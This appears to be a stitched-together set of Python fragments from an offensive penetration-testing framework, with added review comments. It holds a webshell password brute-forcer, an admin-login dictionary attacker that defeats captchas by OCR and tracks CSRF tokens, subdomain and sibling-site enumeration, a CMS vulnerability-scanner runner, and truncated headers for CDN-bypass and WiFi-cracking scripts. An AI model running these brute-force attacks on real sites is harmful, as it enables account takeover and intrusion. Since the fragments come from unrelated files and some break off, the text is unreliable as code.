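def crack_webshell(url, anyway=1):
    """Dictionary-attack the password of a suspected webshell at *url*.

    ``anyway`` selects the mode.  Note that the default is ``1`` (the original
    comment claimed ``0``), so the verdict of ``check_webshell_url`` is only
    consulted when a caller passes some other value:

      * ``1`` - run the direct (``direct_bao``) dictionary attack no matter what
        the webshell check says;
      * ``2`` - form-based (``biaodan_bao``) attack; not implemented upstream,
        prints a notice and returns ``""``;
      * anything else - decide from ``check_webshell_url(url)['y2']``:
        ``direct_bao`` -> dictionary attack, ``biaodan_bao`` -> not
        implemented, ``bypass`` -> report a password-less shell, otherwise
        report "not a webshell".

    The dictionary is ``<ModulePath>dicts/webshell_passwords.txt``; the file
    extension guessed by ``get_webshell_suffix_type`` is handed to
    ``crack_ext_direct_webshell_url`` unchanged.

    Returns ``"webshell:<url>,password:<pw>"`` when a password is found (the
    caller stores this in the target's ``cracked_webshell_urls_info``
    column), ``""`` when the attack fails or the mode is unsupported, and the
    "not a webshell" message otherwise.
    """
    figlet2file("cracking webshell", 0, True)
    print("cracking webshell --> %s" % url)
    print("正在使用吃奶的劲爆破...")
    ext = get_webshell_suffix_type(url)
    kind = check_webshell_url(url)['y2']

    if anyway == 1 or kind == "direct_bao":
        result = crack_ext_direct_webshell_url(
            url, ModulePath + "dicts/webshell_passwords.txt", ext)
        if result['cracked'] == 0:
            print("webshell爆破失败 :(")
            return ""
        return "webshell:%s,password:%s" % (url, result['password'])

    if anyway == 2 or kind == "biaodan_bao":
        # crack_allext_biaodan_webshell_url is disabled upstream; the original
        # fell through to `return strings_to_write` with the name unbound.
        print("form-based (biaodan_bao) webshell brute force is not implemented")
        return ""

    if kind == "bypass":
        print(Fore.RED +
              "congratulations!!! webshell may found and has no password!!!")
        print(Fore.RED + "cracked webshell:%s no password!!!" % url)
        # The original formatted `return_value['password']` here, but no
        # attack ran in this branch so `return_value` was never bound
        # (NameError).  An unauthenticated shell is recorded with an empty
        # password so the record shape matches the cracked case.
        return "webshell:%s,password:%s" % (url, "")

    return "这不是一个webshell :("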
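def get_sub_domains(target, use_tool="Sublist3r"):
    """Enumerate sub-domains of *target* with Sublist3r and/or subDomainsBrute.

    ``target`` must carry a scheme (``http://www.example.com``).  Its host
    part is reduced to the registrable root by ``get_root_domain`` and that
    root is what the tools receive.  ``use_tool`` is ``"Sublist3r"``,
    ``"subDomainsBrute"`` or ``"all"``; any other value runs nothing.

    Results are cached in ``<logFolderPath>/sub/<host>_sub.txt`` (dots in the
    host replaced by underscores); when the cache exists no tool is run.
    Returns the cache contents as a string, ``""`` when the tools produced no
    output (nothing is cached then, so the next call retries), or ``None``
    when ``target`` has no scheme.

    Security notes:
      * the tools are ``git clone``d from GitHub on first use and their
        dependencies are pip-installed at run time - unpinned, unverified
        code executed with the caller's privileges;
      * host names may come from scraped sources (see ``get_pang_domains``),
        so every external command is run through ``subprocess`` with an
        argument list (no shell).  The original built shell strings with
        ``os.system``, which let a crafted host name inject commands.
    """
    import subprocess

    if target[:4] == "http":
        domain = target.split("/")[-1]
    else:
        print(
            "make sure your para in get_sub_domains func has scheme like http or https"
        )
        return
    figlet2file("geting sub domains", 0, True)
    root_domain = get_root_domain(domain)

    sub_dir = os.path.join(logFolderPath, "sub")
    os.makedirs(sub_dir, exist_ok=True)
    store_file = os.path.join(sub_dir, domain.replace(".", "_") + "_sub.txt")

    sublist3r_dir = ModulePath + "Sublist3r"
    brute_dir = ModulePath + "subDomainsBrute"
    sublist3r_out = "Sublist3r.out.txt"
    brute_out = "subDomainsBrute.out.txt"

    def _run(argv, cwd=None):
        # argv list + shell=False: root_domain travels as one argument and is
        # never parsed by a shell.  Exit status is returned, never raised.
        return subprocess.run(argv, cwd=cwd, check=False).returncode

    def _sublist3r():
        # Sublist3r writes its result next to itself; return that path.
        if not os.path.exists(sublist3r_dir):
            _run(["git", "clone", "https://github.com/aboul3la/Sublist3r.git",
                  sublist3r_dir])
            # NOTE(review): installs whatever the freshly cloned
            # requirements.txt asks for - unpinned supply chain.
            _run(["pip", "install", "-r", "requirements.txt"], cwd=sublist3r_dir)
        _run(["python", "sublist3r.py", "-v", "-d", root_domain,
              "-o", sublist3r_out], cwd=sublist3r_dir)
        return os.path.join(sublist3r_dir, sublist3r_out)

    def _subdomainsbrute():
        if not os.path.exists(brute_dir):
            _run(["git", "clone",
                  "https://github.com/lijiejie/subDomainsBrute.git", brute_dir])
            _run(["pip", "install", "dnspython"])
        _run(["python", "subDomainsBrute.py", "-i", "-o", brute_out,
              root_domain], cwd=brute_dir)
        return os.path.join(brute_dir, brute_out)

    def _merge(result_file):
        # Append a tool's output lines to the cache, skipping lines already
        # present, then remove the tool's scratch file.  (The original
        # compared against readlines() of a file opened in "a+" mode, which
        # sits at EOF and therefore never de-duplicated anything.)
        if not os.path.exists(result_file):
            return
        seen = set()
        if os.path.exists(store_file):
            with open(store_file, "r") as cached:
                seen.update(cached)
        with open(result_file, "r") as src, open(store_file, "a") as dst:
            for line in src:
                if line not in seen:
                    dst.write(line)
                    seen.add(line)
        os.remove(result_file)

    if os.path.exists(store_file):
        # Cache hit from a previous run.
        print("you have got the sub domains last time")
    elif use_tool == "all":
        _merge(_sublist3r())
        _merge(_subdomainsbrute())
    elif use_tool == "Sublist3r":
        _merge(_sublist3r())
    elif use_tool == "subDomainsBrute":
        _merge(_subdomainsbrute())

    if not os.path.exists(store_file):
        # No tool wrote anything (or use_tool was unknown): report empty
        # rather than failing on open() as the original did.
        return ""
    with open(store_file, "r") as f:
        return f.read()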
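### function: try to get the actual ip behind cdn
### date: 2016-11-05
### author: quanyechavshuo
### blog: http://3xp10it.cc
#############################################################
# usage:python3 xcdn.py www.baidu.com
import time
import os
import sys
import re

# exp10it is the author's helper package.  When it is missing it is
# installed from PyPI on the fly: an unpinned, network-dependent
# supply-chain step that runs with the user's privileges.  Pin a version
# (or vendor the package) before using this outside a throwaway lab.
try:
    import exp10it
except ImportError:
    # Was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit.
    os.system("pip3 install exp10it")
    # os.system("pip3 install exp10it -U --no-cache-dir")
from exp10it import figlet2file
try:
    figlet2file("3xp10it", 0, True)
except Exception:
    # The banner is cosmetic; never let it abort the tool.
    pass
time.sleep(1)
from exp10it import CLIOutput
from exp10it import get_root_domain
from exp10it import get_string_from_command
from exp10it import get_http_or_https
from exp10it import post_request
from exp10it import get_request
from exp10it import checkvpn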
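###
### name: xwifi
### function: auto crack wifi in macOS
### date: 2017-06-07
### author: quanyechavshuo
### blog: http://3xp10it.cc
#############################################################
# macOS only; tested on macOS Sierra 10.12.5.
import time
import os
import re
import sys
from multiprocessing import Process

# Upgrades the helper package from PyPI on *every* launch: unpinned,
# network-dependent, and run with the user's privileges.  Pin or vendor
# exp10it before relying on this outside a lab.
os.system("pip3 install exp10it -U --no-cache --retries 0")
from exp10it import figlet2file
figlet2file("xwifi", 0, True)
time.sleep(1)
from exp10it import get_string_from_command
from exp10it import get_all_file_name

# Seed word-list used later for the handshake test.  Written from Python
# instead of `echo ... >` through a shell.  NOTE(review): the path is a fixed
# name in the world-writable /tmp, so on a shared machine another user can
# pre-create (or symlink) it; a tempfile.mkdtemp() directory would be safer
# if the reading side can be changed too.
with open("/tmp/forhandshakedict.txt", "w") as seed:
    seed.write("testfor_handshake\n")

a = get_string_from_command("ack")
if re.search(r"not found", a, re.I):
    input(
        "Please install ack first,eg.brew install ack,after you finished it,press anykey to continue."
    )
a = get_string_from_command("airport")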
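def get_pang_domains(target):
    """Return sibling sites ("pang" domains) hosted on the same IP as *target*.

    ``target`` is ``http(s)://host``.  The real IP is resolved through
    ``Xcdn`` (CDN-aware); when that fails (``return_value == 0``) no lookup
    is attempted.  Candidate hosts come from a Bing ``ip:<ip>`` search and
    are kept only when ``get_ip(host)`` resolves to one of ``target``'s own A
    records.  Results are cached in ``<LOG_FOLDER_PATH>/pang/<host>_pang.txt``
    by ``save_url_to_file``; when that file exists its contents are returned
    verbatim.

    Returns a newline-terminated string of ``scheme://host`` entries (minus
    ``target`` itself), an explanatory message when the IP or the DNS name
    cannot be resolved, or ``None`` when ``target`` has no scheme.

    NOTE(review): the host names come from a third-party search index and are
    later handed to other tooling - treat them as untrusted input (never
    interpolate them into shell strings).
    """
    import os
    import socket

    if target[:4] == "http":
        domain = target.split("/")[-1]
    else:
        print("please make sure param has scheme http or https")
        return
    figlet2file("geting pang domains", 0, True)
    print(target)

    pang_dir = "%s/pang" % LOG_FOLDER_PATH
    os.makedirs(pang_dir, exist_ok=True)
    domain_pang_file = "%s/%s_pang.txt" % (pang_dir, domain.replace(".", "_"))

    if os.path.exists(domain_pang_file):
        # Cache hit from a previous run.
        print("you have got the pang domains last time")
        with open(domain_pang_file, "r+") as f:
            return f.read()

    ip = Xcdn(domain).return_value
    if ip == 0:
        # Behind a CDN and the origin could not be found: skip rather than
        # list the CDN's shared edge tenants.
        return_string = "Sorry,since I can not find the actual ip behind the cdn,I will not get pang domains."
        print(return_string)
        return return_string

    print(domain)
    try:
        all_nics_ip = socket.gethostbyname_ex(domain)[2]
    except socket.gaierror as exc:
        # Nothing to compare candidates against; the original raised here.
        msg = "can not resolve %s: %s" % (domain, exc)
        print(msg)
        return msg

    seen = set()
    http_domain_list = []
    for piece in bing_search(query="ip:%s" % ip, market='Web'):
        result_url = piece['Url']
        scheme = "https://" if "https://" in result_url else "http://"
        # "scheme://host/..." -> "host".  The original sliced off the last
        # character before splitting, which mangled results that lacked a
        # trailing slash.
        each_domain = re.sub(r"^https?://", "", result_url).split("/")[0]
        if each_domain in seen:
            continue
        # Keep only hosts that really resolve to one of target's addresses;
        # search indexes are noisy.
        if get_ip(each_domain) in all_nics_ip:
            seen.add(each_domain)
            http_domain_list.append(scheme + each_domain)

    print(http_domain_list)
    save_url_to_file(http_domain_list, domain_pang_file)
    return "".join(
        each + "\n" for each in http_domain_list
        if re.sub(r"(\s)$", "", each) != target)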
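#############################################################
###
###   _|_|_|    _|    _|  _|    _|
### _|    _|  _|  _|_|_|  _|_|  _|  _|  _|_|_|_|
###   _|_|  _|_|  _|  _|  _|  _|  _|  _|  _|
### _|  _|  _|  _|  _|  _|  _|  _|  _|  _|
###   _|_|_|  _|  _|  _|_|_|  _|  _|  _|  _|_|
###                      _|
###                      _|
###
### name: blog.py
### function: write blog
### date: 2016-11-02
### author: quanyechavshuo
### blog: http://3xp10it.cc
#############################################################
import time
import os

# The helper package is (re)installed from PyPI *before* it is imported.  In
# the original the import came first, so a machine without exp10it died with
# ImportError before the installer could run.  This is still an unpinned
# upgrade over the network on every launch - pin a version for anything that
# must be reproducible.
os.system("pip3 install exp10it -U --no-cache")
from exp10it import figlet2file
from exp10it import blog

figlet2file("3xp10it", 0, True)
time.sleep(1)
blog()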
def crack_admin_login_url(
        url: str,
        user_dict_file: str = ModulePath + "dicts/user.txt",
        pass_dict_file: str = ModulePath + "dicts/pass.txt",
        yanzhengma_len: int = 0):
    """Dictionary attack against an admin login form at *url*.

    The page is rendered with ``get_request(url, by="seleniumPhantomJS")`` to
    find the user/password field names and the form action; every username in
    ``user_dict_file`` is then tried against every password in
    ``pass_dict_file`` through one ``requests.session()`` so cookies persist.
    When ``get_yanzhengma_form_and_src_from_url`` reports a captcha, each
    attempt fetches and decodes one via ``get_one_valid_yangzhengma_from_src``
    - unless the form posts to a different path than the page URL, in which
    case a single captcha value typed by the operator is reused for every
    attempt.  When ``get_url_has_csrf_token`` reports a token it is re-read
    from every response.  ``yanzhengma_len`` (0 = don't check) rejects decoded
    captcha strings of any other length; set it by hand when the automatic
    decoding is unreliable.

    Success heuristic: a response longer than 1.5 x the unauthenticated page.
    That is a guess about the target, not a real login check - expect false
    positives on verbose error pages and false negatives on redirect-to-
    dashboard logins.

    Returns the "cracked admin login url:..." summary on success, "" when
    nothing matched, and None when the page does not look like a login form.

    Known weaknesses, left as-is and marked inline: no request timeouts,
    candidate credentials echoed to stdout, no URL-encoding of the tried
    values, a shared ``img.png`` scratch file across worker threads, and an
    unlocked attempt counter.
    """
    import requests
    figlet2file("cracking admin login url", 0, True)
    print("cracking admin login url:%s" % url)
    print("正在使用吃奶的劲爆破登录页面...")

    def crack_admin_login_url_thread(url,username,password):
        # One (username, password) attempt; runs inside the thread pool below
        # and reads/writes the one-element "boxes" defined in the outer scope.
        if get_flag[0] == 1:
            # Another worker already succeeded.
            return
        # NOTE(review): incremented from up to 20 threads with no lock; only
        # the progress display depends on it.
        try_time[0] += 1
        if requestAction=="GET":
            # Substitute the candidate values into the action URL's query
            # string.  NOTE(review): nothing is URL-encoded or regex-escaped,
            # so a value containing '&', '=' or '#' (or a field name with
            # regex metacharacters) corrupts the request.
            final_request_url=form_action_url
            final_request_url=re.sub(r"%s=[^&]*" % user_form_name,"%s=%s" % (user_form_name,username),final_request_url)
            final_request_url=re.sub(r"%s=[^&]*" % pass_form_name,"%s=%s" % (pass_form_name,password),final_request_url)
            if has_yanzhengma[0]:
                if needOnlyGetOneYanZhengMa:
                    yanzhengmaValue=onlyOneYanZhengMaValue
                else:
                    yanzhengmaValue=get_one_valid_yangzhengma_from_src(yanzhengma_src)
                final_request_url=re.sub(r"%s=[^&]*" % yanzhengma_form_name,"%s=%s" % (yanzhengma_form_name,yanzhengmaValue),final_request_url)
            if hasCsrfToken:
                final_request_url=re.sub(r"%s=[^&]*" % csrfTokenName,currentCsrfTokenPart[0],final_request_url)
            # NOTE(review): no timeout - a stalled target blocks this worker forever.
            html=s.get(final_request_url).text
            if hasCsrfToken:
                # Token rotates per response; keep the next attempt in step.
                csrfTokenValue=get_csrf_token_value_from_html(html)
                currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue
        else:
            #post request
            # form_action_url is "<action>^<name=value&...>"; rebuild the body
            # with the candidate credentials swapped in.
            paramPartValue=form_action_url.split("^")[1]
            paramList=paramPartValue.split("&")
            values={}
            for eachP in paramList:
                # NOTE(review): a parameter without '=' raises IndexError here,
                # and a value containing '=' is truncated at the first one.
                eachPList=eachP.split("=")
                eachparamName=eachPList[0]
                eachparamValue=eachPList[1]
                if eachparamName==user_form_name:
                    eachparamValue=username
                if eachparamName==pass_form_name:
                    eachparamValue=password
                values[eachparamName]=eachparamValue
            if has_yanzhengma[0]:
                if not needOnlyGetOneYanZhengMa:
                    values[yanzhengma_form_name]=get_one_valid_yangzhengma_from_src(yanzhengma_src)
                else:
                    values[yanzhengma_form_name]=onlyOneYanZhengMaValue
            if hasCsrfToken:
                # currentCsrfTokenPart[0] is "name=value"; keep only the value.
                values[csrfTokenName]=re.search(r"[^=]+=(.*)",currentCsrfTokenPart[0]).group(1)
            # NOTE(review): no timeout here either.
            html = s.post(form_action_url.split("^")[0], values).text
            if hasCsrfToken:
                csrfTokenValue=get_csrf_token_value_from_html(html)
                currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue
        # Progress line; echoes the candidate credentials to the terminal.
        USERNAME_PASSWORD = "******" + username + ":" + \
            password + ")" + (52 - len(password)) * " "
        # Average speed is recomputed every 100 attempts.
        left_time = get_remain_time(
            start[0], biaoji_time[0], remain_time[0], 100, try_time[0], sum[0])
        remain_time[0] = left_time
        sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' + str(try_time[0] * 100 // sum[0]) + '%' + ' %s/%s remain time:%s %s\r' % (try_time[0], sum[0], remain_time[0], USERNAME_PASSWORD))
        sys.stdout.flush()
        if len(html) > logined_least_length:
            # Treated as a successful login (length heuristic, see docstring).
            get_flag[0] = 1
            end = time.time()
            CLIOutput().good_print(
                "congratulations!!! admin login url cracked succeed!!!", "red")
            string = "cracked admin login url:%s username and password:(%s:%s)" % (
                url, username, password)
            CLIOutput().good_print(string, "red")
            return_string[0]=string
            print("you spend time:" + str(end - start[0]))
            http_domain_value = get_http_domain_from_url(url)
            # executor.terminate() only stops the current thread, not the pool,
            # hence the get_flag box checked at the top of every attempt.
            # table_name_list / urls_table_name below are computed but unused,
            # and the dict returned here is dropped by executor.map (its
            # results are never consumed).
            table_name_list = get_target_table_name_list(http_domain_value)
            urls_table_name = http_domain_value.split(
                "/")[-1].replace(".", "_") + "_urls"
            return {'username': username, 'password': password}

    def crack_admin_login_url_inside_func(url, username, pass_dict_file):
        # Try every password in pass_dict_file for one username.
        # urls and usernames are parallel lists of the same value, so that
        # executor.map can zip them with passwords.
        urls = []
        usernames = []
        # passwords holds every line of pass_dict_file, trailing whitespace stripped.
        passwords = []
        i = 0
        # Keep prompting until an existing dictionary path is given.
        while 1:
            if os.path.exists(pass_dict_file) is False:
                print("please input your password dict:>", end=' ')
                pass_dict_file = input()
                if os.path.exists(pass_dict_file) is True:
                    break
            else:
                break
        f = open(pass_dict_file, "r+")
        for each in f:
            urls.append(url)
            usernames.append(username)
            each = re.sub(r"(\s)$", "", each)
            passwords.append(each)
            i += 1
        f.close()
        # `sum` (shadows the builtin) is the total attempt count shown in the
        # progress line: usernames x passwords.
        sum[0] = usernames_num * i
        # A captcha typed once or a rotating CSRF token must be kept in step
        # between requests, so those cases run single-threaded.
        if needOnlyGetOneYanZhengMa or hasCsrfToken:
            max_workers=1
        else:
            max_workers=20
        with futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
            executor.map(crack_admin_login_url_thread, urls, usernames, passwords)

    def get_one_valid_yangzhengma_from_src(yanzhengmaUrl):
        # Fetch a captcha image through the shared session (not via the
        # exp10it get_request/post_request helpers, because the server-side
        # session must be preserved), decode it with
        # get_string_from_url_or_picfile (OCR, presumably - TODO confirm), and
        # retry until the text is non-empty, purely alphanumeric and - when
        # yanzhengma_len is set - of that exact length.
        # NOTE(review): the fixed ./img.png name is shared by up to 20 worker
        # threads, which overwrite and `rm` each other's image; each attempt
        # also sleeps 3 s.
        #yanzhengma = get_string_from_url_or_picfile(yanzhengma_src)
        while 1:
            import shutil
            response = s.get(yanzhengmaUrl, stream=True)
            with open('img.png', 'wb') as out_file:
                shutil.copyfileobj(response.raw, out_file)
            del response
            yanzhengma = get_string_from_url_or_picfile("img.png")
            os.system("rm img.png")
            time.sleep(3)
            if re.search(r"[^a-zA-Z0-9]+", yanzhengma):
                # time.sleep(3)
                continue
            elif re.search(r"\s", yanzhengma):
                continue
            elif yanzhengma == "":
                continue
            else:
                if yanzhengma_len != 0:
                    if len(yanzhengma) != yanzhengma_len:
                        continue
                # print(yanzhengma)
                # print(len(yanzhengma))
                break
        return yanzhengma

    # Render the page to discover the form; bail out when no user/password
    # fields or no form action are found.
    a=get_request(url,by="seleniumPhantomJS")
    get_result = get_user_and_pass_form_from_html(a['content'])
    user_form_name = get_result['user_form_name']
    pass_form_name = get_result['pass_form_name']
    if user_form_name is None:
        print("user_form_name is None")
        return
    if pass_form_name is None:
        print("pass_form_name is None")
        return
    form_action_url = a['formActionValue']
    #default request action=post
    # A '^' in formActionValue separates the action from the POST body; without
    # it the form is submitted as a GET.
    requestAction="POST"
    if a['hasFormAction']:
        if "^" not in a['formActionValue']:
            requestAction="GET"
    else:
        print("url is not a admin login url entry")
        return
    # One-element lists act as mutable "function-global" state shared with
    # the nested worker functions.
    get_flag = [0]
    return_string=[""]
    try_time = [0]
    sum = [0]
    start = [0]
    # Marks the current time (function-wide mutable state).
    biaoji_time = [0]
    # Marks the estimated remaining time (function-wide mutable state).
    tmp = time.time()
    remain_time = [tmp - tmp]
    # current_username_password={}
    has_yanzhengma = [False]
    find_yanzhengma = get_yanzhengma_form_and_src_from_url(url)
    if find_yanzhengma:
        yanzhengma_form_name = find_yanzhengma['yanzhengma_form_name']
        yanzhengma_src = find_yanzhengma['yanzhengma_src']
        has_yanzhengma = [True]
    hasCsrfToken=False
    forCsrfToken=get_url_has_csrf_token(url)
    if forCsrfToken['hasCsrfToken']:
        hasCsrfToken=True
        csrfTokenName=forCsrfToken['csrfTokenName']
        csrfTokenPart=csrfTokenName+"="
    currentCsrfTokenPart=[""]
    s = requests.session()
    # sesssion start place
    sessionStart=s.get(url)
    unlogin_length = len(sessionStart.text)
    # A response longer than 1.5 x the unauthenticated page counts as logged in.
    logined_least_length = unlogin_length + unlogin_length / 2
    if hasCsrfToken:
        csrf_token_value=get_csrf_token_value_from_html(sessionStart.text)
        currentCsrfTokenPart=[csrfTokenPart+csrf_token_value]
    # If the form posts to a different path than the page it was found on,
    # the captcha is assumed not to rotate per request and is asked for once.
    needOnlyGetOneYanZhengMa=False
    if has_yanzhengma[0]:
        if "^" in form_action_url:
            #post request
            print(get_value_from_url(form_action_url.split("^")[0])['y1'])
            if get_value_from_url(form_action_url.split("^")[0])['y1']!=get_value_from_url(a['currentUrl'])['y1']:
                # should update yanzhengma everytime
                needOnlyGetOneYanZhengMa=True
        else:
            #get request
            if get_value_from_url(form_action_url)['y1']!=get_value_from_url(a['currentUrl'])['y1']:
                needOnlyGetOneYanZhengMa=True
    if needOnlyGetOneYanZhengMa:
        print("Congratulation! Target login url need only one yanzhengma!!")
        import shutil
        response = s.get(yanzhengma_src, stream=True)
        with open('img.png', 'wb') as out_file:
            shutil.copyfileobj(response.raw, out_file)
        del response
        onlyOneYanZhengMaValue= input("Please open img.png and input the yanzhengma string:>")
        #get_string_from_url_or_picfile("img.png")
        os.system("rm img.png")
    with open(r"%s" % user_dict_file, "r+") as user_file:
        all_users = user_file.readlines()
    usernames_num = len(all_users)
    start[0] = time.time()
    for username in all_users:
        # Nested thread pools once failed to cover every combination, so the
        # outer loop over usernames stays single-threaded.
        username = re.sub(r'(\s)$', '', username)
        crack_admin_login_url_inside_func(a['currentUrl'], username, pass_dict_file)
    return return_string[0]
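def single_cms_scan(target):
    """Fingerprint the CMS behind *target* and run the matching scanner.

    ``target`` is ``http(s)://host`` (a main target, a sibling site or a
    sub-domain).  ``cms_identify`` picks the CMS; for ``discuz``, ``joomla``
    and ``wordpress`` the corresponding third-party scanner (dzscan,
    joomscan, wpscan) is fetched on first use, run once per host, and its log
    cached under ``<ModulePath>log/cms_scan_log/<scanner>/``.  Returns the
    scanner's log text, or ``""`` when the CMS is unknown or unsupported or
    the scanner produced no log (the original raised UnboundLocalError /
    FileNotFoundError in those cases).

    Security notes, flagged for review rather than changed in spirit:
      * scanners are fetched from GitHub or a plain-HTTP SourceForge mirror
        with no pinning or checksum, and missing Perl/Ruby dependencies are
        installed with ``sudo apt-get`` / CPAN / ``gem`` - a run-time supply
        chain running with elevated privileges;
      * ``target`` may originate from scraped search results, so every
        command is run through ``subprocess`` with an argument list instead
        of the original ``os.system`` shell strings, which allowed command
        injection through the host name.
    """
    import shutil
    import subprocess

    figlet2file("cms scaning...", 0, True)
    print(target)
    cms_value = cms_identify(target)
    if cms_value == "unknown":
        return ""

    host = target.split("/")[-1]
    tools_dir = ModulePath + "cms_scan"
    # NOTE(review): directories are created under logFolderPath but logs are
    # read from ModulePath + "log/"; this only lines up when
    # logFolderPath == ModulePath + "log" (as in the original) - confirm.
    os.makedirs(logFolderPath + "/cms_scan_log", exist_ok=True)
    os.makedirs(tools_dir, exist_ok=True)
    log_root = ModulePath + "log/cms_scan_log"

    def _run(argv, cwd=None):
        # argv list, no shell: `target` is one argument and is never parsed
        # by sh.  Returns the exit status; 0 means success.
        return subprocess.run(argv, cwd=cwd, check=False).returncode

    def _cache(produced, cached):
        # Move a freshly written scanner log into the cache directory.
        if os.path.exists(produced):
            shutil.move(produced, cached)

    def _read(path):
        if not os.path.exists(path):
            return ""
        with open(path, "r") as f:
            return f.read()

    cms_scan_result = ""

    if cms_value == 'discuz':
        log_dir = log_root + "/dzscan"
        os.makedirs(log_dir, exist_ok=True)
        tool_dir = tools_dir + "/dzscan"
        if not os.path.exists(tool_dir):
            _run(["git", "clone", "https://github.com/code-scan/dzscan.git"],
                 cwd=tools_dir)
        log_file = host.replace(".", "_") + ".log"
        cached = log_dir + "/" + log_file
        if not os.path.exists(cached):
            # `--update && -u` in the original: scan only if the update succeeded.
            if _run(["python", "dzscan.py", "--update"], cwd=tool_dir) == 0:
                _run(["python", "dzscan.py", "-u", target, "--log"], cwd=tool_dir)
            _cache(tool_dir + "/" + log_file, cached)
        cms_scan_result = _read(cached)

    if cms_value == 'joomla':
        log_dir = log_root + "/joomscan"
        os.makedirs(log_dir, exist_ok=True)
        tool_dir = tools_dir + "/joomscan"
        if not os.path.exists(tool_dir):
            # NOTE(review): plain-HTTP download of a 2012 archive with no
            # integrity check; pin a hash before trusting it.
            archive = "joomscan-latest.zip"
            if _run(["wget",
                     "http://jaist.dl.sourceforge.net/project/joomscan/joomscan/2012-03-10/joomscan-latest.zip"],
                    cwd=tools_dir) == 0:
                if _run(["unzip", archive, "-d", "joomscan"], cwd=tools_dir) == 0:
                    os.remove(tools_dir + "/" + archive)
        result = get_string_from_command(
            "perl %scms_scan/joomscan/joomscan.pl" % ModulePath)
        if re.search(r'you may need to install the Switch module', result):
            # NOTE(review): privileged package install from inside a scanner.
            if _run(["sudo", "apt-get", "install", "libswitch-perl"]) == 0:
                _run(["perl", "-MCPAN", "-e", "install WWW::Mechanize"])
        # joomscan writes report/<host>-joexploit.txt; the cache keeps only the
        # basename.  (The original tested the cache with the "report/" prefix,
        # so it never hit, and moved the file to a CWD-relative path that the
        # read below could not find.)
        log_file = "report/%s-joexploit.txt" % host
        cached = log_dir + "/" + log_file[7:]
        if not os.path.exists(cached):
            if _run(["perl", "joomscan.pl", "update"], cwd=tool_dir) == 0:
                _run(["perl", "joomscan.pl", "-u", target, "-ot"], cwd=tool_dir)
            _cache(tool_dir + "/" + log_file, cached)
        cms_scan_result = _read(cached)

    if cms_value == 'wordpress':
        log_dir = log_root + "/wpscan"
        os.makedirs(log_dir, exist_ok=True)
        tool_dir = tools_dir + "/wpscan"
        if not os.path.exists(tool_dir):
            if _run(["git", "clone", "https://github.com/wpscanteam/wpscan.git"],
                    cwd=tools_dir) == 0:
                # `echo y | unzip` in the original == overwrite without asking.
                _run(["unzip", "-o", "data.zip"], cwd=tool_dir)
        result = get_string_from_command("ruby %scms_scan/wpscan/wpscan.rb" % ModulePath)
        if re.search(r'ERROR', result):
            # NOTE(review): privileged dependency install from inside a scanner.
            _run(["sudo", "apt-get", "install", "libcurl4-openssl-dev", "libxml2",
                  "libxml2-dev", "libxslt1-dev", "ruby-dev", "build-essential",
                  "libgmp-dev", "zlib1g-dev"])
            # `bundle install` needs wpscan's Gemfile, so run it in tool_dir
            # (the original ran it in the caller's CWD).
            if _run(["gem", "install", "bundler"]) == 0:
                _run(["bundle", "install"], cwd=tool_dir)
        log_file = "%s.txt" % host
        cached = log_dir + "/" + log_file
        if not os.path.exists(cached):
            produced = tool_dir + "/" + log_file
            if _run(["ruby", "wpscan.rb", "--update"], cwd=tool_dir) == 0:
                # Replacement for `| tee`: echo each line and keep a copy.
                with subprocess.Popen(["ruby", "wpscan.rb", target], cwd=tool_dir,
                                      stdout=subprocess.PIPE, text=True) as proc, \
                        open(produced, "w") as log:
                    for line in proc.stdout:
                        print(line, end="")
                        log.write(line)
            _cache(produced, cached)
        cms_scan_result = _read(cached)

    print(cms_scan_result)
    return cms_scan_result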